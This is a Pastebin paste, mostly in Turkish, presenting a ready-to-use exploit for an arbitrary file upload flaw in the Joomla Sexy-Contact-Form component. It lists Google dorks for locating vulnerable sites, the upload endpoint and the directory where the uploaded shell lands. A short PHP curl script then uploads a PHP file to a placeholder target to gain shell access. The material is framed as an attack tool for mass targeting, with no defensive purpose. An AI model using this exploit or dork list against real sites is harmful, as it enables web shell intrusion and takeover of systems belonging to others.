Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Exploitin Türkçe Yazarı => KingSkrupellos - Cyberizm Digital Security Team
- Exploitin Başlığı => Joomla Sexy-Contact-Form Arbitrary File Upload Vulnerability Exploit
- Konu => https://www.cyberizm.org/cyberizm-joomla-sexy-contact-form-shell-upload-vulnerability-exploit.html
- Videolu Anlatım =>
- [video=youtube]https://www.youtube.com/watch?v=ZVL2jvAafnA[/video]
- Google Dork:
- inurl:”/components/com_sexycontactform/”
- intext:””Powered by sexycontactform”
- Exploit : HEDEFSITE/components/com_sexycontactform/fileupload/index.php
- Dosyanın Yüklendiği Dizin =>
- HEDEFSİTE/components/com_sexycontactform/fileupload/files/DOSYAN.php
- [hide][code]
- #!/usr/bin/php -q
- <?php
- #Google Dorks: "Powered by sexycontact" site:gr
- #or use your mind :v
- #Shell Access: Http://site.com/components/com_sexycontactform/fileupload/files/sh3ll.php
- echo "###############<<com_sexycontactform File Upload>>##############\n\n";
- print " Coded By KingSkrupellos "
- ";
- echo "Cyberizm.Org Digital Security Team\n\n";
- echo "####################[#]Welcome Master[#}######################\n\n";
- $uploadfile="up.php";
- $ch =curl_init("http://HEDEFSITE/components/com_sexycontactform/fileupload/index.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('file'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- print $postResult;
- curl_close($ch);
- ?>[/code][/hide]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement